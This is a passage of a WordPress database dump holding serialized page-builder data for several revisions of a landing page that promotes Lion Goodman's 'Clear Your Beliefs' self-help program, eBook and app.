-43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:735:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">\nDownload the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.\n</p>\n<center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:880:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:719:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1116, 1601, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:735:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">\nDownload the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.\n</p>\n<center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:880:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:719:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1119, 1604, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:687:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:719:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
